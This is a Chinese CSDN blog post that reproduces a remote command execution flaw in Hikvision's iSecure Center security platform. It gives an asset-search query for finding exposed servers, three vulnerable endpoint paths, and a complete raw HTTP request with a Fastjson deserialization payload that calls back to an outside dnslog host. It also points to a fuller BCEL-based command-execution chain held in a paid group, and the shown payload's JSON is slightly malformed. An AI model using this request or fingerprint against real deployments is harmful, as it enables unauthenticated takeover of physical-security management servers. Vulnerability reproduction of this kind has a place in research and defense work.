海康威视iSecure-Center 综合安防管理平台 applyAutoLoginTicket/keepAlive/applyCT 远程命令执行漏洞

已于 2024-06-12 14:29:50 修改
阅读量858 收藏 1
点赞数 23
分类专栏: 漏洞复现 文章标签: 安全
于 2024-06-12 12:39:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WuYSec/article/details/139622039
版权

0x01 漏洞描述

海康威视iSecure Center综合安防管理平台是一套集成化、智能化的安防管理系统。

海康威视iSecure Center综合安防管理平台存在远程命令执行漏洞,可造成远程命令执行。

0x02 资产测绘

app="HIKVISION-综合安防管理平台" ||app="HIKVISION-iSecure-Center"

0x03 漏洞复现

使用DNSLOG进行漏洞检测,三个路径都可以

/bic/ssoService/v1/applyAutoLoginTicket

/bic/ssoService/v1/keepAlive

/bic/ssoService/v1/applyCT

POST /bic/ssoService/v1/applyAutoLoginTicket HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)
Content-Length: 3330
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
Connection: close

{"CTGT":{ "a": {"@type":"java.net.InetSocketAddress"{"address":,"val":"bx0art.dnslog.cn"}}}}

也可通过BCEL链加载字节码实现回显命令执行(星球内自取)

0x04 知识星球

WuY1nSec
关注
  • 23
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
海康威视iSecure Center 综合安防管理平台detection接口存在远程命令执行漏洞
xiaokp7的博客
07-24 638
HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,获取边缘节点数据,实现安防信息化集成与联动,以电子地图为载体,融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、统一配置、统一管理和统一调度。
海康威视综合安防管理平台 多处 FastJson反序列化RCE漏洞复现
0xSec
06-07 1855
由于海康威视综合安防管理平台使用了低版本的fastjson,攻击者可在未鉴权情况下获取服务器权限,且由于存在相关依赖,即使服务器不出网无法远程加载恶意类也可通过本地链直接命令执行,从而获取服务器权限。
漏洞复现】海康威视综合安防管理平台 iSecure Center applyCT fastjson 远程代码执行
siu~
05-21 1283
海康威视综合安防管理平台 `iSecure Center applyCT fastjson` 远程代码执行
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 798
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
海康威视运行管理中心 Fastjson RCE
Keepb1ue的博客
12-21 3074
海康威视运行管理中心系统存在低版本Fastjson远程命令执行漏洞,攻击者可在未鉴权情况下获取服务器权限,且由于存在相关依赖,即使服务器不出网无法远程加载恶意类也可通过本地利用链直接命令执行,从而获取服务器权限。
海康威视综合安防管理平台Fastjson远程命令执行漏洞
holyxp的博客
07-24 1990
综合安防管理平台基于 " 统一软件技术架构" 理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、配置、管理和调度。
海康综合安防管理平台远程命令执行漏洞(CNVD-2024-18673)复现
最新发布
fly夏天的博客
06-19 1319
海康综合安防管理平台远程命令执行漏洞(CNVD-2024-18673)复现
海康威视iSecure Center综合安防管理平台-视频联网网关(NCG)用户手册
04-19
海康威视iSecure Center是一款综合安防管理平台,旨在提供高效、全面的视频监控解决方案。该平台中的视频联网网关(NCG)是其核心组件之一,主要负责视频数据的联网管理和处理。以下是对该用户手册中涉及的关键知识...
iSecure Center综合安防管理平台配置手册 V2.0.0
01-04
海康威视iSecure Center综合安防管理平台配置手册 V2.0.0】是针对该公司的安防管理系统的一份详细指南。iSecure Center是一个一体化、智能化的解决方案,它旨在通过集成视频监控、停车场管理、门禁控制以及报警...
海康威视iSecure Center综合管理平台产品手册
01-12
海康威视iSecure Center综合管理平台是一款专为安防领域设计的高度集成化和智能化的管理工具,旨在满足全行业的综合安防需求。该平台基于“统一软件技术架构”理念,运用业务组件化技术,确保了平台在业务扩展上的...
HIKVISION iSecure Center 综合安防管理平台 快速配置手册 V1.1.0.zip
05-11
HIKVISION iSecure Center 综合安防管理平台 快速配置手册旨在引导用户完成中心管理服务的安装部署,必要设备接入及配置、特殊使用场景的配置,使得用户能够快速开始使用本产品
HIKVISION iSecure Center 综合安防管理平台 人工访客客户端 操作指南 V1.1.0.chm
09-04
HIKVISION iSecure Center 综合安防管理平台 人工访客客户端 操作指南 V1.1.0
HIKVISION iSecure Center 综合安防管理平台 自助访客客户端 操作指南 V1.1.0.chm
09-04
HIKVISION iSecure Center 综合安防管理平台 自助访客客户端 操作指南 V1.1.0
HIKVISION iSecure Center 综合安防管理平台 快速配置手册 V1.1.0.pdf
09-04
HIKVISION iSecure Center 综合安防管理平台 快速配置手册 V1.1.0
HIKVISION iSecure Center 综合安防管理平台 自助客户端操作指南 V1.1.0.pdf
09-04
HIKVISION iSecure Center 综合安防管理平台 大屏控制客户端软件V1.1.0(iPad)操作指南.pdf
iSecure Center 综合安防管理平台安装部署手册 - Linux.pdf
12-10
综合安防管理平台安装部署手册,详细介绍了如何安装iSecure 如何每一步操作都很清晰,如果有任何问题都可以问我,我装了好多遍
漏洞复现】海康威视综合安防管理平台 多处 FastJson反序列化RCE漏洞
siu~
06-07 1044
由于海康威视综合安防管理平台使用了低版本的fastison,不出网无法远程加载恶意类也可通过本地链直接命令执行,从而获取服务器权限。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值